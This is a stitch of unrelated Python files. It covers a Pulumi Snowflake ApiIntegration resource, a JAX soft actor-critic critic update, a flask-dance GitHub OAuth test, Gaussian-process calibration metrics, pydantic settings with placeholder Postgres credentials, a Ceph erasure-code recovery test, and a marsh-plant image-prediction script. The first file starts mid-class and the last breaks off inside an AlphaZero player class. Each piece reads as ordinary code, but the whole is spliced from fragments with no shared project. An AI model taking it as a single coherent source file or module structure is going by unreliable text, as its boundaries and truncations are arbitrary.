api_allowed_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. """ return pulumi.get(self, "api_allowed_prefixes") @api_allowed_prefixes.setter def api_allowed_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "api_allowed_prefixes", value) @property @pulumi.getter(name="apiAwsExternalId") def api_aws_external_id(self) -> Optional[pulumi.Input[str]]: """ The external ID that Snowflake will use when assuming the AWS role. """ return pulumi.get(self, "api_aws_external_id") @api_aws_external_id.setter def api_aws_external_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "api_aws_external_id", value) @property @pulumi.getter(name="apiAwsIamUserArn") def api_aws_iam_user_arn(self) -> Optional[pulumi.Input[str]]: """ The Snowflake user that will attempt to assume the AWS role. """ return pulumi.get(self, "api_aws_iam_user_arn") @api_aws_iam_user_arn.setter def api_aws_iam_user_arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "api_aws_iam_user_arn", value) @property @pulumi.getter(name="apiAwsRoleArn") def api_aws_role_arn(self) -> Optional[pulumi.Input[str]]: """ ARN of a cloud platform role. """ return pulumi.get(self, "api_aws_role_arn") @api_aws_role_arn.setter def api_aws_role_arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "api_aws_role_arn", value) @property @pulumi.getter(name="apiBlockedPrefixes") def api_blocked_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. 
""" return pulumi.get(self, "api_blocked_prefixes") @api_blocked_prefixes.setter def api_blocked_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "api_blocked_prefixes", value) @property @pulumi.getter(name="apiProvider") def api_provider(self) -> Optional[pulumi.Input[str]]: """ Specifies the HTTPS proxy service type. """ return pulumi.get(self, "api_provider") @api_provider.setter def api_provider(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "api_provider", value) @property @pulumi.getter(name="azureAdApplicationId") def azure_ad_application_id(self) -> Optional[pulumi.Input[str]]: """ The 'Application (client) id' of the Azure AD app for your remote service. """ return pulumi.get(self, "azure_ad_application_id") @azure_ad_application_id.setter def azure_ad_application_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_ad_application_id", value) @property @pulumi.getter(name="azureConsentUrl") def azure_consent_url(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "azure_consent_url") @azure_consent_url.setter def azure_consent_url(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_consent_url", value) @property @pulumi.getter(name="azureMultiTenantAppName") def azure_multi_tenant_app_name(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "azure_multi_tenant_app_name") @azure_multi_tenant_app_name.setter def azure_multi_tenant_app_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_multi_tenant_app_name", value) @property @pulumi.getter(name="azureTenantId") def azure_tenant_id(self) -> Optional[pulumi.Input[str]]: """ Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. 
""" return pulumi.get(self, "azure_tenant_id") @azure_tenant_id.setter def azure_tenant_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_tenant_id", value) @property @pulumi.getter(name="createdOn") def created_on(self) -> Optional[pulumi.Input[str]]: """ Date and time when the API integration was created. """ return pulumi.get(self, "created_on") @created_on.setter def created_on(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "created_on", value) @property @pulumi.getter def enabled(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. """ return pulumi.get(self, "enabled") @enabled.setter def enabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "enabled", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. 
""" return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) class ApiIntegration(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, api_allowed_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_aws_role_arn: Optional[pulumi.Input[str]] = None, api_blocked_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_provider: Optional[pulumi.Input[str]] = None, azure_ad_application_id: Optional[pulumi.Input[str]] = None, azure_tenant_id: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None, __props__=None): """ ## Example Usage ```python import pulumi import pulumi_snowflake as snowflake api_integration = snowflake.ApiIntegration("apiIntegration", api_allowed_prefixes=["https://123456.execute-api.us-west-2.amazonaws.com/prod/"], api_aws_role_arn="arn:aws:iam::000000000001:/role/test", api_provider="aws_api_gateway", enabled=True) ``` ## Import ```sh $ pulumi import snowflake:index/apiIntegration:ApiIntegration example name ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_allowed_prefixes: Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. :param pulumi.Input[str] api_aws_role_arn: ARN of a cloud platform role. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_blocked_prefixes: Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. :param pulumi.Input[str] api_provider: Specifies the HTTPS proxy service type. :param pulumi.Input[str] azure_ad_application_id: The 'Application (client) id' of the Azure AD app for your remote service. 
:param pulumi.Input[str] azure_tenant_id: Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. :param pulumi.Input[bool] enabled: Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. :param pulumi.Input[str] name: Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. """ ... @overload def __init__(__self__, resource_name: str, args: ApiIntegrationArgs, opts: Optional[pulumi.ResourceOptions] = None): """ ## Example Usage ```python import pulumi import pulumi_snowflake as snowflake api_integration = snowflake.ApiIntegration("apiIntegration", api_allowed_prefixes=["https://123456.execute-api.us-west-2.amazonaws.com/prod/"], api_aws_role_arn="arn:aws:iam::000000000001:/role/test", api_provider="aws_api_gateway", enabled=True) ``` ## Import ```sh $ pulumi import snowflake:index/apiIntegration:ApiIntegration example name ``` :param str resource_name: The name of the resource. :param ApiIntegrationArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... 
def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(ApiIntegrationArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, api_allowed_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_aws_role_arn: Optional[pulumi.Input[str]] = None, api_blocked_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_provider: Optional[pulumi.Input[str]] = None, azure_ad_application_id: Optional[pulumi.Input[str]] = None, azure_tenant_id: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = ApiIntegrationArgs.__new__(ApiIntegrationArgs) if api_allowed_prefixes is None and not opts.urn: raise TypeError("Missing required property 'api_allowed_prefixes'") __props__.__dict__["api_allowed_prefixes"] = api_allowed_prefixes __props__.__dict__["api_aws_role_arn"] = api_aws_role_arn __props__.__dict__["api_blocked_prefixes"] = api_blocked_prefixes if api_provider is None and not opts.urn: raise TypeError("Missing required property 'api_provider'") __props__.__dict__["api_provider"] = api_provider __props__.__dict__["azure_ad_application_id"] = azure_ad_application_id __props__.__dict__["azure_tenant_id"] = azure_tenant_id 
__props__.__dict__["enabled"] = enabled __props__.__dict__["name"] = name __props__.__dict__["api_aws_external_id"] = None __props__.__dict__["api_aws_iam_user_arn"] = None __props__.__dict__["azure_consent_url"] = None __props__.__dict__["azure_multi_tenant_app_name"] = None __props__.__dict__["created_on"] = None super(ApiIntegration, __self__).__init__( 'snowflake:index/apiIntegration:ApiIntegration', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, api_allowed_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_aws_external_id: Optional[pulumi.Input[str]] = None, api_aws_iam_user_arn: Optional[pulumi.Input[str]] = None, api_aws_role_arn: Optional[pulumi.Input[str]] = None, api_blocked_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_provider: Optional[pulumi.Input[str]] = None, azure_ad_application_id: Optional[pulumi.Input[str]] = None, azure_consent_url: Optional[pulumi.Input[str]] = None, azure_multi_tenant_app_name: Optional[pulumi.Input[str]] = None, azure_tenant_id: Optional[pulumi.Input[str]] = None, created_on: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None) -> 'ApiIntegration': """ Get an existing ApiIntegration resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_allowed_prefixes: Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. 
:param pulumi.Input[str] api_aws_external_id: The external ID that Snowflake will use when assuming the AWS role. :param pulumi.Input[str] api_aws_iam_user_arn: The Snowflake user that will attempt to assume the AWS role. :param pulumi.Input[str] api_aws_role_arn: ARN of a cloud platform role. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_blocked_prefixes: Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. :param pulumi.Input[str] api_provider: Specifies the HTTPS proxy service type. :param pulumi.Input[str] azure_ad_application_id: The 'Application (client) id' of the Azure AD app for your remote service. :param pulumi.Input[str] azure_tenant_id: Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. :param pulumi.Input[str] created_on: Date and time when the API integration was created. :param pulumi.Input[bool] enabled: Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. :param pulumi.Input[str] name: Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. 
""" opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _ApiIntegrationState.__new__(_ApiIntegrationState) __props__.__dict__["api_allowed_prefixes"] = api_allowed_prefixes __props__.__dict__["api_aws_external_id"] = api_aws_external_id __props__.__dict__["api_aws_iam_user_arn"] = api_aws_iam_user_arn __props__.__dict__["api_aws_role_arn"] = api_aws_role_arn __props__.__dict__["api_blocked_prefixes"] = api_blocked_prefixes __props__.__dict__["api_provider"] = api_provider __props__.__dict__["azure_ad_application_id"] = azure_ad_application_id __props__.__dict__["azure_consent_url"] = azure_consent_url __props__.__dict__["azure_multi_tenant_app_name"] = azure_multi_tenant_app_name __props__.__dict__["azure_tenant_id"] = azure_tenant_id __props__.__dict__["created_on"] = created_on __props__.__dict__["enabled"] = enabled __props__.__dict__["name"] = name return ApiIntegration(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="apiAllowedPrefixes") def api_allowed_prefixes(self) -> pulumi.Output[Sequence[str]]: """ Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. """ return pulumi.get(self, "api_allowed_prefixes") @property @pulumi.getter(name="apiAwsExternalId") def api_aws_external_id(self) -> pulumi.Output[str]: """ The external ID that Snowflake will use when assuming the AWS role. """ return pulumi.get(self, "api_aws_external_id") @property @pulumi.getter(name="apiAwsIamUserArn") def api_aws_iam_user_arn(self) -> pulumi.Output[str]: """ The Snowflake user that will attempt to assume the AWS role. """ return pulumi.get(self, "api_aws_iam_user_arn") @property @pulumi.getter(name="apiAwsRoleArn") def api_aws_role_arn(self) -> pulumi.Output[Optional[str]]: """ ARN of a cloud platform role. 
""" return pulumi.get(self, "api_aws_role_arn") @property @pulumi.getter(name="apiBlockedPrefixes") def api_blocked_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]: """ Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. """ return pulumi.get(self, "api_blocked_prefixes") @property @pulumi.getter(name="apiProvider") def api_provider(self) -> pulumi.Output[str]: """ Specifies the HTTPS proxy service type. """ return pulumi.get(self, "api_provider") @property @pulumi.getter(name="azureAdApplicationId") def azure_ad_application_id(self) -> pulumi.Output[Optional[str]]: """ The 'Application (client) id' of the Azure AD app for your remote service. """ return pulumi.get(self, "azure_ad_application_id") @property @pulumi.getter(name="azureConsentUrl") def azure_consent_url(self) -> pulumi.Output[str]: return pulumi.get(self, "azure_consent_url") @property @pulumi.getter(name="azureMultiTenantAppName") def azure_multi_tenant_app_name(self) -> pulumi.Output[str]: return pulumi.get(self, "azure_multi_tenant_app_name") @property @pulumi.getter(name="azureTenantId") def azure_tenant_id(self) -> pulumi.Output[Optional[str]]: """ Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. """ return pulumi.get(self, "azure_tenant_id") @property @pulumi.getter(name="createdOn") def created_on(self) -> pulumi.Output[str]: """ Date and time when the API integration was created. """ return pulumi.get(self, "created_on") @property @pulumi.getter def enabled(self) -> pulumi.Output[Optional[bool]]: """ Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. """ return pulumi.get(self, "enabled") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ Specifies the name of the API integration. This name follows the rules for Object Identifiers. 
The name should be unique among api integrations in your account. """ return pulumi.get(self, "name")
python
from typing import Tuple

import jax
import jax.numpy as jnp

from jaxrl.datasets import Batch
from jaxrl.networks.common import InfoDict, Model, Params, PRNGKey


def target_update(critic: Model, target_critic: Model, tau: float) -> Model:
    """Polyak-average the critic parameters into the target critic.

    new_target = tau * critic + (1 - tau) * target_critic

    Args:
        critic: online critic model.
        target_critic: slow-moving target critic model.
        tau: interpolation factor in [0, 1]; small values move the target
            slowly.

    Returns:
        The target critic with updated parameters.
    """
    # BUG FIX: jax.tree_multimap was deprecated and later removed from JAX;
    # jax.tree_util.tree_map is the supported multi-tree equivalent and has
    # accepted multiple trees for a long time, so this is backward-compatible.
    new_target_params = jax.tree_util.tree_map(
        lambda p, tp: p * tau + tp * (1 - tau), critic.params,
        target_critic.params)

    return target_critic.replace(params=new_target_params)


def update(key: PRNGKey, actor: Model, critic: Model, target_critic: Model,
           temp: Model, batch: Batch, discount: float,
           soft_critic: bool) -> Tuple[Model, InfoDict]:
    """One SAC critic update step.

    Builds the (optionally soft) Bellman target from the target critic and
    the actor's next-state action distribution, then regresses both Q heads
    onto that target.

    Args:
        key: PRNG key used to sample next actions.
        actor: policy model; called on next observations.
        critic: online double-Q critic to be updated.
        target_critic: target double-Q critic used to form the backup.
        temp: temperature model; calling it returns the entropy coefficient.
        batch: transition batch with observations, actions, rewards, masks
            and next_observations.
        discount: discount factor gamma.
        soft_critic: if True, subtract the entropy term from the target
            (soft Bellman backup).

    Returns:
        (updated critic, metrics dict with critic_loss / q1 / q2 means).
    """
    dist = actor(batch.next_observations)
    next_actions = dist.sample(seed=key)
    next_log_probs = dist.log_prob(next_actions)
    next_q1, next_q2 = target_critic(batch.next_observations, next_actions)
    # Clipped double-Q: element-wise minimum curbs value overestimation.
    next_q = jnp.minimum(next_q1, next_q2)

    target_q = batch.rewards + discount * batch.masks * next_q

    if soft_critic:
        # Soft backup: the target also pays the entropy bonus of the
        # sampled next action (masks zero this out at terminal states).
        target_q -= discount * batch.masks * temp() * next_log_probs

    def critic_loss_fn(critic_params: Params) -> Tuple[jnp.ndarray, InfoDict]:
        q1, q2 = critic.apply({'params': critic_params}, batch.observations,
                              batch.actions)
        critic_loss = ((q1 - target_q)**2 + (q2 - target_q)**2).mean()
        return critic_loss, {
            'critic_loss': critic_loss,
            'q1': q1.mean(),
            'q2': q2.mean()
        }

    new_critic, info = critic.apply_gradient(critic_loss_fn)

    return new_critic, info
python
import os

import pytest
import flask

from flask_dance.contrib.github import make_github_blueprint, github
from flask_dance.consumer.storage import MemoryStorage

betamax = pytest.importorskip("betamax")

GITHUB_ACCESS_TOKEN = os.environ.get("GITHUB_OAUTH_ACCESS_TOKEN", "fake-token")

current_dir = os.path.dirname(__file__)

with betamax.Betamax.configure() as config:
    config.cassette_library_dir = os.path.join(current_dir, "cassettes")
    config.define_cassette_placeholder("<AUTH_TOKEN>", GITHUB_ACCESS_TOKEN)


@pytest.fixture
def app():
    """Flask app with a GitHub blueprint backed by an in-memory token."""
    _app = flask.Flask(__name__)
    _app.secret_key = "secret"
    github_bp = make_github_blueprint(
        storage=MemoryStorage({"access_token": GITHUB_ACCESS_TOKEN})
    )
    _app.register_blueprint(github_bp, url_prefix="/login")

    @_app.route("/")
    def index():
        if not github.authorized:
            # BUG FIX: `redirect` and `url_for` were referenced unqualified
            # but never imported (only `import flask` is in scope), so this
            # branch raised NameError instead of redirecting to the login.
            return flask.redirect(flask.url_for("github.login"))
        resp = github.get("/user")
        assert resp.ok
        return "You are @{login} on GitHub".format(login=resp.json()["login"])

    return _app


@pytest.fixture
def flask_dance_sessions():
    # Tells betamax_record_flask_dance which session object to record.
    return github


@pytest.mark.usefixtures("betamax_record_flask_dance")
def test_home_page(app):
    """Replays the recorded /user cassette and checks the rendered text."""
    with app.test_client() as client:
        response = client.get("/", base_url="https://example.com")
        assert response.status_code == 200
        text = response.get_data(as_text=True)
        assert text == "You are @singingwolfboy on GitHub"
python
import numpy as np
import scipy as sp
import scipy.stats


def gaussian_loglik(obs, mu, sigma):
    """Per-dimension Gaussian log-likelihood of `obs`.

    The joint multivariate-normal log-density is divided by the
    dimensionality ``mu.shape[0]`` to give an average per-coordinate value.
    """
    return sp.stats.multivariate_normal.logpdf(obs, mean=mu, cov=sigma) / mu.shape[0]


def gaussian_entropy(sigma):
    """Differential entropy of a multivariate Gaussian with covariance `sigma`.

    For a k-dimensional Gaussian, H = 0.5 * (k * (1 + ln(2*pi)) + ln det(sigma)).

    BUG FIX: the previous implementation computed
    0.5 * (k + ln det(sigma) + ln(2*pi)), i.e. it counted the ln(2*pi)
    constant once instead of k times, under-stating the entropy for k > 1
    (the two agree only for k == 1).
    """
    k = len(sigma)
    return 0.5 * (k * (1.0 + np.log(2 * np.pi)) + np.log(np.linalg.det(sigma)))


def r2_score(obs, pred):
    """Coefficient of determination R^2 = 1 - SS_res / SS_tot."""
    return 1 - np.sum((obs - pred) ** 2) / np.sum((obs - np.mean(obs)) ** 2)


def cal_error(obs, mu, sigma, bins=5):
    """
    Unweighted regression calibration error for GP predictions.

    We calculate the mean-squared error between predicted versus observed
    empirical CDFs, for the specified number of equally spaced bins on the
    interval [0,1]. [Equation (9), Kuleshov et. al. 2018]

    Parameters
    ----------
    obs: m-length array of observations
    mu: m-length array of predicted means
    sigma: m x m array of predicted covariance (only the diagonal is used)
    bins: number of bins at which to evaluate

    Returns
    -------
    cal_error: float
    predicted: predicted CDFs corresponding to each bin
    empirical: observed CDFs corresponding to each bin
    """
    # Marginal predictive variances; each observation is scored against its
    # own univariate predictive distribution.
    sigmas = np.diag(sigma)
    quantiles = sp.stats.norm.cdf(obs, mu, np.sqrt(sigmas))
    # Bin edges 1/bins, 2/bins, ..., 1.0 (right-closed).
    predicted = np.arange(1/bins, 1+1/bins, 1/bins)
    empirical = np.array([np.mean(quantiles < p) for p in predicted])
    return np.sum((predicted - empirical) ** 2) / bins, predicted, empirical
python
from pydantic import BaseSettings


class Settings(BaseSettings):
    """Application configuration loaded from the environment.

    pydantic.BaseSettings reads each field from an environment variable of
    the same name, falling back to the defaults below.
    """

    # Display name of the application.
    APP_NAME: str = "FastAPI Boilerplate"
    # From-address used for outgoing mail.
    EMAIL_SENDER: str = "[email protected]"
    # NOTE(review): the placeholder value contains a typo ("stmp" vs "smtp");
    # left untouched because it is runtime config data meant to be overridden.
    SMTP_SERVER: str = "your_stmp_server_here"
    # PostgreSQL connection settings; "db" as the server name presumably
    # matches a docker-compose service — verify against the deployment.
    POSTGRES_USER: str = "app"
    POSTGRES_PASSWORD: str = "app"
    POSTGRES_SERVER: str = "db"
    POSTGRES_DB: str = "app"


# Singleton settings instance imported by the rest of the application.
settings = Settings()
python
import json
import logging
import random
import time
import traceback

from ceph.rados_utils import RadosHelper

log = logging.getLogger(__name__)


def run(ceph_cluster, **kw):
    """
    CEPH-9311 - RADOS: Pyramid erasure codes (Local Repairable erasure
    codes):
    Bring down 2 osds (in case of k=4) from 2 localities so that recovery
    happens from local repair code

    1. Create a LRC profile and then create a ec pool
        #ceph osd erasure-code-profile set $profile \
            plugin=lrc \
            k=4 m=2 l=3 \
            ruleset-failure-domain=osd
        # ceph osd pool create $poolname 1 1  erasure $profile

    2. start writing objects to the pool
        # rados -p poolname bench 1000 write --no-cleanup

    3. Bring down 2 osds from 2 different localities which contains data
       chunk: (for this we need to figure out mapping) for ex: with
       k=4, m=2, l=3 mapping looks like
           chunk nr    01234567
           step 1      _cDD_cDD    (Here DD are data chunks)
           step 2      cDDD____
           step 3      ____cDDD
       from "step 1" in the above mapping we can see that data chunk is
       divided into 2 localities which is analogous to 2 data centers. So in
       our case for ex we have to bring down (3,7) OR (2,7) OR (2,6) OR (3,6).

    Args:
        ceph_cluster (ceph.ceph.Ceph): ceph cluster

    Returns:
        0 on success, 1 on failure.
    """
    log.info("Running test ceph-9311")
    ceph_nodes = kw.get("ceph_nodes")
    config = kw.get("config")
    build = config.get("build", config.get("rhbuild"))
    mons = []
    role = "client"
    # Collect all client nodes; the first one drives the ceph commands.
    for mnode in ceph_nodes:
        if mnode.role == role:
            mons.append(mnode)

    ctrlr = mons[0]
    log.info("chosing mon {cmon} as ctrlrmon".format(cmon=ctrlr.hostname))
    helper = RadosHelper(ctrlr, config, log)

    """Create an LRC profile"""
    # Random suffix keeps profile/pool names unique across repeated runs.
    sufix = random.randint(0, 10000)
    prof_name = "LRCprofile{suf}".format(suf=sufix)
    # NOTE(review): build "4" vs older releases use different failure-domain
    # option names (crush-failure-domain replaced ruleset-failure-domain).
    if build.startswith("4"):
        profile = "osd erasure-code-profile set {LRCprofile} plugin=lrc k=4 m=2 l=3 \
crush-failure-domain=osd".format(
            LRCprofile=prof_name
        )
    else:
        profile = "osd erasure-code-profile set {LRCprofile} plugin=lrc k=4 m=2 l=3 \
ruleset-failure-domain=osd crush-failure-domain=osd".format(
            LRCprofile=prof_name
        )
    try:
        (out, err) = helper.raw_cluster_cmd(profile)
        outbuf = out.read().decode()
        log.info(outbuf)
        log.info("created profile {LRCprofile}".format(LRCprofile=prof_name))
    except Exception:
        log.error("LRC profile creation failed")
        log.error(traceback.format_exc())
        return 1

    """create LRC ec pool"""
    pool_name = "lrcpool{suf}".format(suf=sufix)
    try:
        helper.create_pool(pool_name, 1, prof_name)
        log.info("Pool {pname} created".format(pname=pool_name))
    except Exception:
        log.error("lrcpool create failed")
        log.error(traceback.format_exc())
        return 1

    """ Bringdown 2 osds which contains a 'D' from both localities
        we will be chosing osd at 2 and 7 from the given active set list
    """
    oname = "UNIQUEOBJECT{i}".format(i=random.randint(0, 10000))
    # Ask the cluster which OSDs would serve this object's PG.
    cmd = "osd map {pname} {obj} --format json".format(pname=pool_name, obj=oname)
    (out, err) = helper.raw_cluster_cmd(cmd)
    outbuf = out.read().decode()
    log.info(outbuf)
    cmdout = json.loads(outbuf)
    # targt_pg = cmdout['pgid']
    target_osds_ids = []
    # Positions 2 and 7 in the up set are data chunks in different
    # localities (see the mapping diagram in the docstring).
    for i in [2, 7]:
        target_osds_ids.append(cmdout["up"][i])

    # putobj = "sudo rados -p {pool} put {obj} {path}".format(
    #     pool=pool_name, obj=oname, path="/etc/hosts"
    # )
    # Seed the pool with 10 small objects before taking OSDs down.
    for i in range(10):
        putobj = "sudo rados -p {pool} put {obj} {path}".format(
            pool=pool_name, obj="{oname}{i}".format(oname=oname, i=i), path="/etc/hosts"
        )
        (out, err) = ctrlr.exec_command(cmd=putobj)

    """Bringdown tosds"""
    # Remember node/service pairs so the OSDs can be revived afterwards.
    osd_service_map_list = []
    for osd_id in target_osds_ids:
        target_osd_hostname = ceph_cluster.get_osd_metadata(osd_id).get("hostname")
        target_osd_node = ceph_cluster.get_node_by_hostname(target_osd_hostname)
        osd_service = ceph_cluster.get_osd_service_name(osd_id)
        osd_service_map_list.append(
            {"osd_node": target_osd_node, "osd_service": osd_service}
        )
        helper.kill_osd(target_osd_node, osd_service)
        time.sleep(5)

    # Poll cluster status (up to ~10s) until "active" appears in the output.
    # NOTE(review): the loop exits one iteration after "active" shows up in
    # the previous read; initial "degrade" seed just forces the first poll.
    outbuf = "degrade"
    timeout = 10
    found = 0
    status = "-s --format json"
    while timeout:
        if "active" not in outbuf:
            (out, err) = helper.raw_cluster_cmd(status)
            outbuf = out.read().decode()
            time.sleep(1)
            timeout = timeout - 1
        else:
            found = 1
            break
    if timeout == 0 and found == 0:
        log.error("cluster didn't become active+clean..timeout")
        return 1

    """check whether read/write can be done on the pool"""
    # Overwrite the same 10 objects while the two OSDs are down...
    for i in range(10):
        putobj = "sudo rados -p {pool} put {obj} {path}".format(
            pool=pool_name, obj="{oname}{i}".format(oname=oname, i=i), path="/etc/hosts"
        )
        (out, err) = ctrlr.exec_command(cmd=putobj)
        log.info(out.read().decode())
    # ...and read them back to /tmp to prove recovery via the local code.
    for i in range(10):
        putobj = "sudo rados -p {pool} get {obj} {path}".format(
            pool=pool_name,
            obj="{oname}{i}".format(oname=oname, i=i),
            path="/tmp/{obj}{i}".format(obj=oname, i=i),
        )
        (out, err) = ctrlr.exec_command(cmd=putobj)
        log.info(out.read().decode())

    """donewith the test ,revive osds"""
    for osd_service_map in osd_service_map_list:
        helper.revive_osd(
            osd_service_map.get("osd_node"), osd_service_map.get("osd_service")
        )

    return 0
python
import numpy as np
import cv2
import re
import torch
import torch.nn as nn
from torchvision import transforms

from marsh_plant_dataset import MarshPlant_Dataset

# --- configuration ----------------------------------------------------------
N_CLASSES = 7
output_columns = ['Row', 'Img_ID', 'Section', 'Sarcocornia', 'Spartina',
                  'Limonium', 'Borrichia', 'Batis', 'Juncus', 'None']
THRESHOLD_SIG = 0.5   # sigmoid threshold for calling a class "present"
batch_size = 32
bShuffle = False
num_workers = 8
image_dim = (512, 512)

# Raw strings: '\d' in a plain string is an invalid escape sequence in
# Python 3 (DeprecationWarning, later SyntaxWarning); value is unchanged.
id_regex = re.compile(r'.*Row(\d+).*DSC_(\d+)_(\d+)')
remove_brackets = re.compile(r'\[(.*)\]')

model_path = './modeling/saved_models/resnext_pa_sig_0.50_2011susie.torch'
data_infile = ['./infiles/2011_Rows1to25_pred_test_infile.txt']
outfile = '2011_Rows1to25_predictions_newformat.txt'

# Load the trained model; torch.load restores it to the device it was saved
# from (assumed CUDA here, matching .to(gpu) below -- TODO confirm).
model = torch.load(model_path)
model.eval()
sigfunc = nn.Sigmoid()

transforms_base = transforms.Compose([
    transforms.Resize(image_dim),
    transforms.ToTensor(),
    transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])

pred_data = MarshPlant_Dataset(data_infile, train=False, transform=transforms_base)
data_loader = torch.utils.data.DataLoader(pred_data, batch_size=batch_size,
                                          shuffle=bShuffle, num_workers=num_workers)

cpu = torch.device("cpu")
gpu = torch.device("cuda")

# Accumulate per-image metadata (parsed from filenames) and binary
# presence/absence predictions, row-aligned.
results = {'Row': [], 'img': [], 'sector': [],
           'pred': np.empty((0, N_CLASSES), int)}
with torch.no_grad():
    for it, batch in enumerate(data_loader):
        output = model(batch['X'].to(gpu)).to(cpu)
        sig = sigfunc(output)
        sig = sig.detach().numpy()
        this_pred = sig > THRESHOLD_SIG
        results['pred'] = np.append(results['pred'], this_pred.astype(int), axis=0)

        for file in batch['fname']:
            m = id_regex.search(file)
            if m:
                results['Row'].append(m.group(1))
                results['img'].append(m.group(2))
                results['sector'].append(m.group(3))
            else:
                # Unparseable filename: keep row alignment with placeholders.
                results['Row'].append('x')
                results['img'].append('x')
                results['sector'].append('x')

# BUG FIX: the output file was opened but never closed/flushed; a context
# manager guarantees the file is closed even if a write fails.
with open(outfile, 'w') as fout:
    header = '\t'.join(output_columns) + '\n'
    fout.write(header)
    for i in range(len(results['Row'])):
        fout.write('{}\t{}\t{}\t'.format(results['Row'][i], results['img'][i],
                                         results['sector'][i]))
        # np.array2string yields e.g. "[0 1 0 ...]"; strip the brackets.
        str_out = np.array2string(results['pred'][i, :])
        m = remove_brackets.match(str_out)
        str_out = m[1]
        fout.write('%s\t' % str_out)
        fout.write('\n')
python
from glob import glob

from config import BOARD_HEIGHT, BOARD_WIDTH, N_IN_ROW
from utils import get_model_path
from config import globalV
from game import Board, Game
from mcts_alphaZero import MCTSPlayer
from policy_value_net_pytorch import PolicyValueNet

"""
input location as '3,3' to play
"""


class Human:
    """Console-input human player."""

    def __init__(self):
        # Player index; assigned by the game engine via set_player_ind.
